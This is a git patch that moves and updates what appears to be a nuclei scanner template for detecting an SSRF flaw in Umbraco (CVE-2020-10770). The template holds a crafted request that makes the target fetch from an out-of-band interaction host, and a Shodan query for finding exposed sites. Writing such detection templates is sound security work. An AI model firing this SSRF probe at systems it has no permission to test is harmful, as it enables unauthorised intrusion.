From 1bd96f890253a5d56222617530baa7913a80372c Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Tue, 5 Jul 2022 08:23:51 +0530
Subject: [PATCH] Update and rename
 misconfiguration/vulnerabilities/other/umbraco-base-ssrf.yaml to
 vulnerabilities/other/umbraco-base-ssrf.yaml

---
 .../other/umbraco-base-ssrf.yaml                      | 11 +++++++++++
 1 file changed, 11 insertions(+)
 rename {misconfiguration/vulnerabilities => vulnerabilities}/other/umbraco-base-ssrf.yaml (80%)

diff --git a/misconfiguration/vulnerabilities/other/umbraco-base-ssrf.yaml b/vulnerabilities/other/umbraco-base-ssrf.yaml
similarity index 80%
rename from misconfiguration/vulnerabilities/other/umbraco-base-ssrf.yaml
rename to vulnerabilities/other/umbraco-base-ssrf.yaml
index 39c49d6239..0966f25483 100644
--- a/misconfiguration/vulnerabilities/other/umbraco-base-ssrf.yaml
+++ b/vulnerabilities/other/umbraco-base-ssrf.yaml
@@ -11,6 +11,9 @@ info:
     cvss-score: 5.3
     cve-id: CVE-2020-10770
     cwe-id: CWE-601
+  metadata:
+    verified: true
+    shodan-query: http.html:"Umbraco"
   tags: ssrf,umbraco,oast
 
 requests:
@@ -21,8 +24,16 @@ requests:
       - '{{BaseURL}}/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss?section=AvoidGetCacheItem&baseUrl=http://{{interactsh-url}}/'
 
     stop-at-first-match: true
+    req-condition: true
+    matchers-condition: and
     matchers:
       - type: word
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
           - "http"
+
+      - type: dsl
+        dsl:
+          - "len(body_1)==0"
+          - "len(body_2)==0"
+          - "len(body_3)==0"